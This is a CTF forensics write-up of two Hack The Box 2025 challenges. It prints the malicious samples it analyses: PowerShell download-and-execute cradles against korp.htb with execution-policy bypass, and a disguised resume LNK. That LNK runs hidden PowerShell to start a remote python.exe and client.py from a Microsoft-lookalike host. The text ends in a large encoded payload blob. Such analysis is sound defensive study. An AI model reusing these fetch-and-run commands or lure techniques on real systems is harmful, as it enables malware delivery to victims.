Cyber Apocalypse CTF 2025 Tales from Eldoria - Writeups
This is a writeup for all forensics challenges from Cyber Apocalypse CTF 2025 Tales from Eldoria. After a tough battle, L3ak managed to achieve 5th place worldwide! Overall, another great CTF by the Hack the Box crew. The forensics challenges this year were definitely easier compared to previous years, but much more enjoyable and unique.
Thorin’s Amulet [Forensics]
Question: Garrick and Thorin’s visit to Stonehelm took an unexpected turn when Thorin’s old rival, Bron Ironfist, challenged him to a forging contest. In the end Thorin won the contest with a beautifully engineered clockwork amulet but the victory was marred by an intrusion. Saboteurs stole the amulet and left behind some tracks. Because of that it was possible to retrieve the malicious artifact that was used to start the attack. Can you analyze it and reconstruct what happened? Note: make sure that domain korp.htb resolves to your docker instance IP and also consider the assigned port to interact with the service.
Flag: HTB{7h0R1N_H45_4lW4Y5_833n_4N_9r347_1NV3n70r}
We are given a Powershell script and docker instance to investigate. A long base64 string can be obtained from the Powershell script, which seems to be a Powershell command that fetches the content of a file hosted in korp.htb
.
1
2
3
4
5
6
7
function qt4PO {
if ($env:COMPUTERNAME -ne "WORKSTATION-DM-0043") {
exit
}
powershell.exe -NoProfile -NonInteractive -EncodedCommand "SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwOi8va29ycC5odGIvdXBkYXRlIik="
}
qt4PO
1
IEX (New-Object Net.WebClient).DownloadString("http://korp.htb/update")
Modifying /etc/hosts/
with the hostname and docker IP, the content of the file can be obtained. The Powershell script seems to be fetching a PowerShell script hosted in korp.htb
using a custom request header.
1
2
3
4
5
function aqFVaq {
Invoke-WebRequest -Uri "http://korp.htb/a541a" -Headers @{"X-ST4G3R-KEY"="5337d322906ff18afedc1edc191d325d"} -Method GET -OutFile a541a.ps1
powershell.exe -exec Bypass -File "a541a.ps1"
}
aqFVaq
Downloading the PowerShell script with the custom request header, a hex encoded flag can be obtained.
1
2
3
4
$a35 = "4854427b37683052314e5f4834355f346c573459355f3833336e5f344e5f39723334375f314e56336e3730727d"
($a35-split"(..)"|?{$_}|%{[char][convert]::ToInt16($_,16)}) -join ""
# HTB{7h0R1N_H45_4lW4Y5_833n_4N_9r347_1NV3n70r}
A new Hire [Forensics]
Question: The Royal Archives of Eldoria have recovered a mysterious document—an old resume once belonging to Lord Malakar before his fall from grace. At first glance, it appears to be an ordinary record of his achievements as a noble knight, but hidden within the text are secrets that reveal his descent into darkness.
Flag: HTB{4PT_28_4nd_m1cr0s0ft_s34rch=1n1t14l_4cc3s!!}
We are given a EML file and docker instance to investigate. The content of the EML file is as follows:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Hello Work Team,
I hope this email finds you well. We have received a new application for the open position, and we wanted to bring it to your attention.
The applicant, Lord Malakar, has an extensive background in leadership, strategic planning, and resource management.
With years of experience commanding large-scale operations, overseeing tactical deployments, and influencing key stakeholders, Malakar believes he would be a strong asset to your organization.
Key Highlights from His Experience:
Strategic Leadership: Spearheaded large-scale initiatives that reshaped industry landscapes.
Crisis Management: Adept at handling high-pressure situations and making decisive calls.
Team Motivation: Known for fostering loyalty and rallying teams toward ambitious goals.
Innovative Thinking: Developed groundbreaking methods to enhance efficiency and control.
We believe Malakar's skills and experience could be a great fit for your team, and he is eager to discuss how he can contribute to [Company Name]'s continued success.
You can review his resume here:
`storage.microsoftcloudservices.com:[PORT]/index.php`
Please let us know if you would like to proceed with the next steps in the hiring process.
Best regards,
Elowan
PS: Make sure you replace the '[PORT]' with your instance's port. Additionally, make sure that any hostnames that are found point to your instance's IP address!
Modifying /etc/hosts/
with the hostname and docker IP, the contents of storage.microsoftcloudservices.com:[PORT]/index.php
can be accessed and analyzed. Analyzing the source code, a suspicious JavaScript function can be identified fetching resume files from a specific directory.
Analyzing the directory, a suspicious LNK file can be seen being hosted in the website.
Downloading and analyzing the LNK file, the malicious base64 string can be identified.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
└─$ exiftool Resume.lnk
ExifTool Version Number : 13.10
File Name : Resume.lnk
Directory : .
File Size : 1370 bytes
File Modification Date/Time : 2025:03:22 11:10:11+08:00
File Access Date/Time : 2025:03:22 11:10:15+08:00
File Inode Change Date/Time : 2025:03:22 11:10:11+08:00
File Permissions : -rw-r--r--
File Type : LNK
File Type Extension : lnk
MIME Type : application/octet-stream
Flags : IDList, WorkingDir, CommandArgs
File Attributes : (none)
Create Date : 2025:03:22 11:04:58+08:00
Access Date : 2025:03:22 11:04:58+08:00
Modify Date : 2025:03:22 11:04:58+08:00
Target File Size : 0
Icon Index : (none)
Run Window : Show Minimized No Activate
Hot Key : (none)
Target File DOS Name : cmd.exe
Working Directory : C:\Windows\System32\
Command Line Arguments : /c powershell.exe -W Hidden -nop -ep bypass -NoExit -E WwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJwBtAHMAZQBkAGcAZQAnACwAIAAnAGgAdAB0AHAAOgAvAC8AcwB0AG8AcgBhAGcAZQAuAG0AaQBjAHIAbwBzAG8AZgB0AGMAbABvAHUAZABzAGUAcgB2AGkAYwBlAHMALgBjAG8AbQA6ADQANgAwADgANwAvADMAZgBlADEANgA5ADAAZAA5ADUANQBlADgAZgBkADIAYQAwAGIAMgA4ADIANQAwADEANQA3ADAAZQAxAGYANAAvAHIAZQBzAHUAbQBlAHMAUwAvAHIAZQBzAHUAbQBlAF8AbwBmAGYAaQBjAGkAYQBsAC4AcABkAGYAJwApADsAXABcAHMAdABvAHIAYQBnAGUALgBtAGkAYwByAG8AcwBvAGYAdABjAGwAbwB1AGQAcwBlAHIAdgBpAGMAZQBzAC4AYwBvAG0AQAA0ADYAMAA4ADcAXAAzAGYAZQAxADYAOQAwAGQAOQA1ADUAZQA4AGYAZAAyAGEAMABiADIAOAAyADUAMAAxADUANwAwAGUAMQBmADQAXABwAHkAdABoAG8AbgAzADEAMgBcAHAAeQB0AGgAbwBuAC4AZQB4AGUAIABcAFwAcwB0AG8AcgBhAGcAZQAuAG0AaQBjAHIAbwBzAG8AZgB0AGMAbABvAHUAZABzAGUAcgB2AGkAYwBlAHMALgBjAG8AbQBAADQANgAwADgANwBcADMAZgBlADEANgA5ADAAZAA5ADUANQBlADgAZgBkADIAYQAwAGIAMgA4ADIANQAwADEANQA3ADAAZQAxAGYANABcAGMAbwBuAGYAaQBnAHMAXABjAGwAaQBlAG4AdAAuAHAAeQA=
Decoding the base64 string, the malicious payload can be identified. It seems to execute a Python script after fetching the resume file from another directory.
1
[System.Diagnostics.Process]::Start('msedge', 'http://storage.microsoftcloudservices.com:46087/3fe1690d955e8fd2a0b282501570e1f4/resumesS/resume_official.pdf');\\storage.microsoftcloudservices.com@46087\3fe1690d955e8fd2a0b282501570e1f4\python312\python.exe \\storage.microsoftcloudservices.com@46087\3fe1690d955e8fd2a0b282501570e1f4\configs\client.py
Downloading and analyzing the Python file, the base64 encoded flag can be obtained from the key value.
1
2
3
4
5
6
7
8
9
10
import base64
key = base64.decode("SFRCezRQVF8yOF80bmRfbTFjcjBzMGZ0X3MzNHJjaD0xbjF0MTRsXzRjYzNzISF9Cg==")
# HTB{4PT_28_4nd_m1cr0s0ft_s34rch=1n1t14l_4cc3s!!}
data = base64.b64decode("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